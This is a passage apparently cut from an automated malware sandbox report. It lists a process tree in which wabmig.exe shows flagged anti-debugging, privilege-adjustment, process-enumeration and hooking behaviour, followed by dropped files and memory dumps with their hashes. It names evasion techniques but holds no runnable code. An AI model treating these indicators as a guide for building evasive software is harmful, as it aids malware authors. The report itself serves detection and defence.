              • System Location Discovery: System Language Discovery
              PID:2404
            • C:\Program Files (x86)\windows mail\wabmig.exe
              "C:\Program Files (x86)\windows mail\wabmig.exe"
              5⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2496

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P0EI1YCOUZ0FRHWT6RVQ.temp

      Filesize

      7KB

      MD5

      d0efcdbf5df29dcb8eb71b074b5960e2

      SHA1

      74c924687149c238ad36d834345d52587f9f9801

      SHA256

      83d88e0ff09f7ae1ea7a4897121b3689e16a02d998989409e895f59290f28ee6

      SHA512

      0790c7634b993d92a286d987cab83d095e36b31593a2092776ec57c998ece4eeae1a95d4129c8d5050089667ff167059a4374009d935596b7c836ff01801e330

    • C:\Users\Admin\AppData\Roaming\Refurbishment.War

      Filesize

      478KB

      MD5

      e781b75e17e1aa76a77d51c98740e8d3

      SHA1

      1accd644527bf39c16bf2643f127c807d9d153c9

      SHA256

      0445fc20323e9d59454064d18a1b4fced090d02551ecb8fbbe29ce7f2385a45a

      SHA512

      4263f2ebe2d8d204374fcde8125f3685598a8f86f3906575f4a4edd962fd232c5f1cf98e71341abca0eed2479372ddedb264fa44ef675d3b7242ba398eb64c92

    • memory/2496-43-0x0000000000A90000-0x0000000000AD0000-memory.dmp

      Filesize

      256KB

    • memory/2496-41-0x0000000000A90000-0x0000000001AF2000-memory.dmp

      Filesize

      16.4MB

    • memory/2496-19-0x0000000001B00000-0x0000000002C82000-memory.dmp

      Filesize

      17.5MB

    • memory/2520-18-0x00000000065C0000-0x0000000007742000-memory.dmp

      Filesize

      17.5MB

    • memory/2648-8-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-11-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-15-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

      Filesize

      4KB

    • memory/2648-9-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-17-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-4-0x000007FEF526E000-0x000007FEF526F000-memory.dmp

      Filesize

      4KB

    • memory/2648-7-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-6-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

      Filesize

      32KB

    • memory/2648-42-0x000007FEF4FB0000-0x000007FEF594D000-memory.dmp

      Filesize

      9.6MB

    • memory/2648-5-0x000000001B670000-0x000000001B952000-memory.dmp

      Filesize

      2.9MB